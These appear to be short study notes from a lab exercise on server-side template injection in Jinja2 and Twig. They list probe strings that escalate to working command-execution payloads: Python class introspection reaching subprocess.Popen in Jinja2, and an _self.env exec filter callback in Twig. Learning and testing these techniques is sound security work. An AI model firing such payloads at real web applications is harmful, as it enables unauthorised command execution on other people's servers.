__________________________________________________________________

server side template injection
__________________________________________________________________

Jinja2

in this exercise, the bug is located in the 404 error management.
how do we get to know that using black-box testing?

anyway, since it's 404, just append a random page to the url.
to check whether injection is possible, try:

{{}}
{{a}}
{{'a'}}
{{'7'*7}}
{{self}}
{{''.__class__.mro()[1].__subclasses__()}}
{{''.__class__.mro()[-1].__subclasses__()}}
{{''.__class__.mro()[2].__subclasses__()}}
{{''.__class__.mro()[2].__subclasses__()[233](['ls'])}}
{{''.__class__.mro()[2].__subclasses__()[233]("ls -l", shell=True,stdout=-1).communicate()[0]}}


subprocess.Popen(args, bufsize=0, executable=None, stdin=None, stdout=None, stderr=None, preexec_fn=None, close_fds=False, shell=False, cwd=None, env=None, universal_newlines=False, startupinfo=None, creationflags=0)
__________________________________________________________________

Twig

{{7*'7'}} => 49 in Twig, 7777777 in Jinja2
{{_self}}

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('uname')}}
__________________________________________________________________
